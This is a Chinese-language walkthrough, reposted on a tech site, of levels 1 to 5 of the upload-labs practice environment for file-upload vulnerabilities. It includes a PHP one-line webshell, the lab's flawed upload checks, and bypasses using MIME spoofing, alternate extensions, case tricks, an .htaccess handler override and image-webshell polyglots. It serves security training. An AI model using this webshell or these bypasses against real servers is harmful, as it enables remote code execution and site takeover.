IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 文件上传upload_labs 1-5 -> 正文阅读

[PHP知识库]文件上传upload_labs 1-5

文件上传一般未做防护 即可以上传传我们需要的东西
把上传的文件平拼接到url后面访问一下即可以用webshell管理工具连接即可

这里我们以upload_labs环境为列练习文件上传

一句话木马:

<?php @eval($_POST['caidao']);?>

一句话木马的意思是以POST传递参数pass 用eval函数执行

Pass-1

前端js绕过
这里我们访问环境
提前准备好一句话木马 这里的一句话木马为

<?php @eval($_POST['pass']);?>
    function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
            alert(errMsg);
            return false;
        }
    }

源代码是设置了白名单检测
必须上传后缀名称为jpg png gif
这里我们发现是前端js检测 所以可以禁用js上传文件
上传成功后我们再访问一下
在这里插入图片描述
传参getshell即可

Pass-2

修改mime类型
本关正常准备一个木马
访问pass-2 上传提醒我们文件类型不正确,重新上传

<?php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {                  
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];   #这里是用FILES函数来进行来判断文件的相关信息 即判断文件的MIME类型
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
	#这里获取路径与名字
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}
?>

PHP $_FILES 是一个预定义的数组,用来获取通过 POST 方法上传文件的相关信息
新建一个用于接收文件信息的 PHP 文件 file.php,代码如下:

<?php
echo "<pre>";
print_r($_FILES);
?>

通过源代码可知是对文件MIME类型做了检测,这里抓包改一下MIME类型即可
抓包改Content-Type:images/png 放包
访问
先上传修改后缀名的webshell(webshell.php改为websshell.jpg)进行、抓包修改,后缀名改为webshell.php
在这里插入图片描述

Pass-3

黑名单绕过
在这里插入图片描述
打开题目环境可以看到 网站限制了黑名单 我们可以通过绕过黑名单来达到上传的目的
这里我们可以创建黑名单以外的文件
php3 php4 php5 .phtml .pht
php5(以php5的版本执行PHP文件,高版本向低版本兼容) PhP(大小写绕过)这里环境必须支持才可以
在这里插入图片描述

Pass-4

查看源码发现有一个很长的黑名单
这里虽然几乎都过滤了 但是 值得我们注意的是我们并未发现.htaccess这个后缀名
.htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。 .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。

格式:

<FilesMatch "xxx">
        SetHandler application/x-httpd-php
</Filesmatch>

这段代码的意思是将所有上传的文件内容都以php文件解析执行,需要符合php语法才可以
当然也需要apache支持
配置文件LoadModule rewrite_module modules/mod_rewrite.so前的注释去掉,寻找关键词:AllowOverride,并把后面的参数从None全部改成All
首先上传.htaccess文件,再上传jpg文件解析
然后去上传我们的图片马
copy mm.png/b + mm.php/a 3.png
制作图片马
一个写入木马的php文件 一个图片 cmd -->copy 生成之后我们直接上传.htaccess文件帮我们把图片解析为php文件
访问相当于验证图片有没有存在
菜刀连接
在这里插入图片描述

Pass-5

源代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

这里我们查看源代码发现这里相比较第四关缺少一行把文件后缀名转换为小写的代码
f i l e e x t = s t r t o l o w e r ( file_ext = strtolower( filee?xt=strtolower(file_ext); //转换为小写
这里我们可以通过.phP大写文件名绕过
这里我们先创建一个名为shell.php的shell
内容为:

<?php
phpinfo();
?>

这里我们上传用burpsuit进行抓包
在这里插入图片描述
修改数据包即可
或者直接修改文件后缀类型也可以

简单分享,大佬不喜勿喷

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-11-27 09:43:01  更:2021-11-27 09:43:05 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 20:20:33-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计